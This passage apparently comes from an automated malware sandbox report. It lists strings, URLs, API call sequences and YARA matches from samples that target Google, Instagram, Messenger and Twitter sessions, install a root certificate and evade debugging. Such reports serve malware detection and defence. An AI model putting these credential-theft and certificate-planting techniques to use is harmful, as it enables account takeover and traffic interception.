Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxx
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://content.googleapis.com
Source: 1E1C360C582DF797.exe, 00000015.00000002.831435598.0000000004FD1000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.656349419.0000000005230000.00000004.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.640301592.0000000005C59000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.640301592.0000000005C59000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appnuA2
Source: 1E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/B7
Source: 1E1C360C582DF797.exe, 00000019.00000003.640415667.0000000005C2C000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settings
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settings51iB7
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://hangouts.google.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmpString found in binary or memory: https://iplogger.org/14Zhe7
Source: 1E1C360C582DF797.exeString found in binary or memory: https://mail.google.com/mail
Source: 1E1C360C582DF797.exeString found in binary or memory: https://mail.google.com/mail/#settings
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settingsox
Source: 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mailx
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/
Source: 1E1C360C582DF797.exeString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/
Source: 1E1C360C582DF797.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 1E1C360C582DF797.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: h1GodtbhC8.exeString found in binary or memory: https://sectigo.com/CPS0
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.drString found in binary or memory: https://sectigo.com/CPS0D
Source: 1E1C360C582DF797.exe, 00000015.00000003.563235849.0000000005D32000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmpZk
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ookie:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comReferer:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe.4.drString found in binary or memory: https://www.digicert.com/CPS0
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.google.com/cloudprint
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.google.com/cloudprint/enab
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN9
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint7=
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messagingP
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641821279.0000000005C56000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc2
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevicesH
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/h
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangoutse2/crx
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra/crx0
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accept:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/accept:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/login/nonce/
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/origin:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1

E-Banking Fraud:

barindex
Registers a new ROOT certificateShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,4_2_1001F720
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E624C20 _DebugHeapAllocator,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,std::ios_base::good,ExpandEnvironmentStringsW,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,Concurrency::details::ContextBase::GetWorkQueueIdentity,GetCurrentThreadId,GetThreadDesktop,CreateDesktopW,GetLastError,SetThreadDesktop,GetLastError,CloseDesktop,CreateProcessW,GetLastError,CloseDesktop,FindCloseChangeNotification,CreateJobObjectW,AssignProcessToJobObject,_DebugHeapAllocator,Sleep,Sleep,_DebugHeapAllocator,SetThreadDesktop,CloseDesktop,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,0_2_6E624C20

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 21.2.1E1C360C582DF797.exe.5320000.10.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 21.2.1E1C360C582DF797.exe.4e60000.9.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 25.2.1E1C360C582DF797.exe.5230000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text sectionShow sources
Source: aliens.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 1E1C360C582DF797.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,4_2_10019D40
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,4_2_10019F00
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,4_2_10019F50
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,4_2_10019FA0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01217165: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_01217165
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004079A20_2_004079A2
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004049A80_2_004049A8
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406EFE0_2_00406EFE
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_0040737E0_2_0040737E
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E66CE400_2_6E66CE40
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E66AE3E0_2_6E66AE3E
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E679FF60_2_6E679FF6
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E67BC5D0_2_6E67BC5D
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E67FC010_2_6E67FC01
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E67BB3D0_2_6E67BB3D
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6577140_2_6E657714
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E6677A00_2_6E6677A0
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E66756E0_2_6E66756E
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E66733C0_2_6E66733C
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012185251_2_01218525
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012265B61_2_012265B6
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012301461_2_01230146
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121E1E01_2_0121E1E0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122702F1_2_0122702F
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121404E1_2_0121404E
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121326D1_2_0121326D
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123457A1_2_0123457A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123055E1_2_0123055E
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012237311_2_01223731
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012347A91_2_012347A9
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121E7E01_2_0121E7E0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012127D41_2_012127D4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012239AC1_2_012239AC
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012309931_2_01230993
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_012269EB1_2_012269EB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121F8A81_2_0121F8A8
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01225BE71_2_01225BE7
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123CA201_2_0123CA20
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121BD531_2_0121BD53
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121DDAC1_2_0121DDAC
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01230DC81_2_01230DC8
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122FC4A1_2_0122FC4A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121EC541_2_0121EC54
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01223CDD1_2_01223CDD
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01215F0C1_2_01215F0C
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_01240FD41_2_01240FD4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123CECE1_2_0123CECE
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_00403DA84_2_00403DA8
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_004070714_2_00407071
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000C0634_2_1000C063
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000B8834_2_1000B883
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100060F04_2_100060F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100169BD4_2_100169BD
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100099E04_2_100099E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100071F04_2_100071F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100092574_2_10009257
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10010AED4_2_10010AED
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100083404_2_10008340
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000E3804_2_1000E380
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000ABA04_2_1000ABA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000B3B04_2_1000B3B0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001EBD04_2_1001EBD0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100083F04_2_100083F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000BC574_2_1000BC57
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000C4834_2_1000C483
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100105904_2_10010590
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001EDDB4_2_1001EDDB
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1000FF714_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026EB7CE21_2_026EB7CE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E75D021_2_026E75D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026DEAA121_2_026DEAA1
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026F2BB021_2_026F2BB0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E6D0421_2_026E6D04
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E93BFE21_2_04E93BFE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E8E58A21_2_04E8E58A
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04EA078021_2_04EA0780
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E8C01921_2_04E8C019
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04E83C5121_2_04E83C51
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04EA2F7021_2_04EA2F70
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\71eza90awf48\aliens.exe 6781F617A3F74D85AC7113828B2BE7D0186E32259FD6B4C10E18C6233CB97549
